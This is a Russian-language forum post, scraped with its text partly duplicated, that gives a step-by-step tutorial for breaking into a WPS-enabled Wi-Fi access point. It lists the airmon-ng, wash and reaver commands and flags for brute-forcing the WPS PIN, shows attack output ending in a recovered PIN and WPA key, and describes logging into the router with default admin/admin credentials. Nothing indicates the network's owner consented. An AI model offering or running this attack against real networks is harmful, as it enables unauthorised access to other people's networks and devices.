Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Сегодня мы попробуем осуществить взлом WIFI WPS точки доступа.
Что такое WIFI WPS?
Как взламывать другие типы шифрования я рассказывал в статьях:
А используемое оборудование в статье:
Для подбора ключа используем дистрибьютив
Для начала сделаем подготовительные шаги. Просканируем Wi-Fi диапазон на наличие точек с нужным типом авторизации.
Для этого переведем адаптер в режим мониторинга (будем считать, что Wi-Fi адаптер это wlan0):
В выводе команды мы увидим имя виртуального интерфейса в режиме мониторинга (обычно первый такой интерфейс это mon0).
Теперь просканируем окружающие сети:
Увидим список сетей, которые поддерживают WPS. В дальнейшем нам нужен будет BSSID сети из первой колонки.
И наконец перейдем непосредственно к самому перебору паролей:
Где:
-i mon0 это интерфейс.
-b 64:XX:XX:XX:XX:F4 это BSSID атакуемой точки.
-vv необязательный ключ, он включает подробный вывод, но я люблю смотреть что именно сейчас происходит.
Так же есть дополнительные полезные ключи:
‐‐dh-small — задает небольшое значение секретного ключа, чем немного разгружает точку доступа и немного ускоряет брутфорс.
-t 2 — уменьшает время ожидания ответа (по умолчанию 5 секунд) в данном случае до 2 секунд.
-d 0 — пауза между попытками.
Запустится процесс перебора пин-кодов:
Рано или поздно мы увидим (я увидел примерно чере 6 часов) подобранный пин-код и ключ шифрования сети.
И далее подключаемся к сети.
После подключения к сети, я попробовал зайти на маршрутизатор. Как это не странно, но логин/пароль: admin/admin подошел. Поэтому так же прилагаю скриншоты пин-кода и пароля Wi-Fi с самой точки доступа.
Взлом WIFI WPS Точки доступа успешен!
Что такое WIFI WPS?
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
(защищённая установка), WPS — это стандарт (а так же протокол) полуавтоматического подключения к беспроводной сети Wi-Fi. Этот протокол был придуман дл того, чтобы упростить подключение к беспроводной сети. В итоге он и правда упростил подключение к сети. Причем для всех. Для злоумышленника он тоже упростился. Потому что, хоть в коде WPS 8 знаков, но 8-й знак это контрольная сумма, а так же в протоколе есть уязвимость, которая позволяет проверять пин-код блоками, а не целеком. Первый блок 4 цифры и второй блок 3 цифры. итого получается 9999+999=10998 комбинаций.Как взламывать другие типы шифрования я рассказывал в статьях:
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
А используемое оборудование в статье:
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Для подбора ключа используем дистрибьютив
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
, который был создан для тестов на проникновения.Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
Пожалуйста,
Вход
или
Регистрация
для просмотра содержимого URL-адресов!
и остальные утилиты в него уже встроены. Поэтому описывать, как их установить я не буду.Для начала сделаем подготовительные шаги. Просканируем Wi-Fi диапазон на наличие точек с нужным типом авторизации.
Для этого переведем адаптер в режим мониторинга (будем считать, что Wi-Fi адаптер это wlan0):
Код:
airmon-ng start wlan0
Теперь просканируем окружающие сети:
Код:
wash -i mon0
Код:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner @tacnetsol.com>
BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
64:XX:XX:XX:XX:F4 1 -06 1.0 No BXXXXXXXXXXXXXXXXXXXXXXXr
F8:XX:XX:XX:XX:3B 9 -70 1.0 No aXXXXXX4
60:XX:XX:XX:XX:B8 6 -73 1.0 No AXXXXK</cheffner>
И наконец перейдем непосредственно к самому перебору паролей:
Код:
reaver -i mon0 -vv -b 64:XX:XX:XX:XX:F4
-i mon0 это интерфейс.
-b 64:XX:XX:XX:XX:F4 это BSSID атакуемой точки.
-vv необязательный ключ, он включает подробный вывод, но я люблю смотреть что именно сейчас происходит.
Так же есть дополнительные полезные ключи:
‐‐dh-small — задает небольшое значение секретного ключа, чем немного разгружает точку доступа и немного ускоряет брутфорс.
-t 2 — уменьшает время ожидания ответа (по умолчанию 5 секунд) в данном случае до 2 секунд.
-d 0 — пауза между попытками.
Запустится процесс перебора пин-кодов:
Код:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner @tacnetsol.com>
[+] Waiting for beacon from 64:XX:XX:XX:XX:F4
[+] Switching mon1 to channel 1
[+] Associated with 64:XX:XX:XX:XX:F4 (ESSID: BXXXXXXXXXXXXXXXXXXXXXXXr)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678</cheffner>
Рано или поздно мы увидим (я увидел примерно чере 6 часов) подобранный пин-код и ключ шифрования сети.
Код:
[+] WPS PIN: '762XXX99'
[+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw'
[+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr'
[+] Nothing done, nothing to save.
[+] WPS PIN: '762XXX99'
[+] WPA PSK: 'sdfpoXXXXXXXXXXXXXX;akfw'
[+] AP SSID: 'BXXXXXXXXXXXXXXXXXXXXXXXr'
[+] Nothing done, nothing to save.
После подключения к сети, я попробовал зайти на маршрутизатор. Как это не странно, но логин/пароль: admin/admin подошел. Поэтому так же прилагаю скриншоты пин-кода и пароля Wi-Fi с самой точки доступа.
Взлом WIFI WPS Точки доступа успешен!